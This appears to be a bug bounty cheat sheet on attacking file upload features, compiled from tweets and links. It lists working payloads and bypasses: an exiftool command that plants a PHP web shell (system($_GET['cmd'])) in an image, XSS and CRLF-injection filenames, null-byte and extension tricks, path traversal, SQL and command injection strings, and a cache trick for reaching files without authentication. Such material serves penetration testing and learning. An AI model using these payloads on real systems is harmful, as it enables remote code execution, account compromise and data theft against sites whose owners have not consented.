# File Upload

* [#BugBountyProTip Some caching servers would cache files larger than 2mb. if app accepts file upload, then upload a large file and access it #multiple times while logged-in. It will be cached. Then access it without login, and pingo! unauthenticated access to sensitive files!](https://twitter.com/Zigoo0/status/1247175475316830208)
* [Uploader Vuln:\
  Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx"\
  Content-Type: image/jpeg\
  Res:\
  {"StoreHousePicture\_File":"test.aspx","Success":true}#BugBounty](https://twitter.com/YShahinzadeh/status/1063403827590762497)
* <https://anotherhackerblog.com/exploiting-file-uploads-pt1/>
* <https://anotherhackerblog.com/exploiting-file-uploads-pt-2/>
* Payloads - <https://github.com/1N3/IntruderPayloads/tree/master/Uploads>
* [Bypassing most FILE Uploads filters for $$$$ \* .htaccess <- upload htaccess \* file.svg <- uploading svg = xss \* file.SVg <- must try case mismatch \* file.png.svg \* file.php%00.png \* file.png' or '1'='1 \* ../../file.png \* file.'svg <- invalid ext. #bugbountytips #](https://twitter.com/pwntheweb/status/1258628238655598592)[BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)
* Bypass File Upload Filtering In image : exiftool -Comment='\<?php echo "\<pre>"; system($\_GET\['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click) [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click)
* [Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.](https://twitter.com/HusseiN98D/status/1194304002969743362)
* [#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: \<img src=x onerror=alert('XSS')>.png ">\<img src=x onerror=alert('XSS')>.png ">\<svg onmouseover=alert(1)>.svg <\<script>alert('xss')\<!--a-->a.png](https://twitter.com/h4x0r_dz/status/1292452802338476037)
* [Bypassing most FILE Uploads filters for $$$$ \* .htaccess <- upload htaccess \* file.svg <- uploading svg = xss \* file.SVg <- must try case mismatch \* file.png.svg \* file.php%00.png \* file.png' or '1'='1 \* ../../file.png \* file.'svg <- invalid ext. #bugbountytips #](https://twitter.com/0xsapra/status/1258628238655598592?s=20)[BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)
* [#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: \<img src=x onerror=alert('XSS')>.png ">\<img src=x onerror=alert('XSS')>.png ">\<svg onmouseover=alert(1)>.svg <\<script>alert('xss')\<!--a-->a.png](https://twitter.com/h4x0r_dz/status/1292452802338476037?s=20)
* [Bypass File Upload Filtering In image : exiftool -Comment='\<?php echo "\<pre>"; system($\_GET\['cmd'\]); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips](https://twitter.com/shreyasrx/status/1257501243171373066?s=20)
* [#Bugbountytip Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.](https://twitter.com/Hxzeroone/status/1250342399068352512?s=20)
* [bypassing file content restrictions: in some cases you can do a crlf injection via filename x.png%22%0d%0a%0d%0a%0d%0a\<script>alert(1)\</script> this will cause Content-Disposition to throw its content into the file #bugbounty #xss #crlfinjection #bugbountytip](https://twitter.com/k33r0k/status/1047700322322399233?s=20)
* [RT@CyberSecurityN8: RT@infosecsanyam: RT@th3cyb3rc0p: RT@M404ntf: If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE. #BugBounty #BugBountyTips #InfoSec](https://twitter.com/infosecsanyam/status/1339481832451092480?s=20)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MTeBxfDIJOIOprbYVje%2F-MTeC1rUild_UYMYAiWY%2Fimage.png?alt=media\&token=7b394796-e30d-4747-b569-8f108798fe4e)

[Chaining file uploads with other vulns:](https://twitter.com/ManasH4rsh/status/1315624930998775808?s=20)-

```
Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections
```

Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MWEFbGGk8Sx5GellR2z%2F-MWEFgEN14t2enelKC7W%2Fimage.png?alt=media\&token=79687068-e0c1-4f81-8693-2569c2db2729)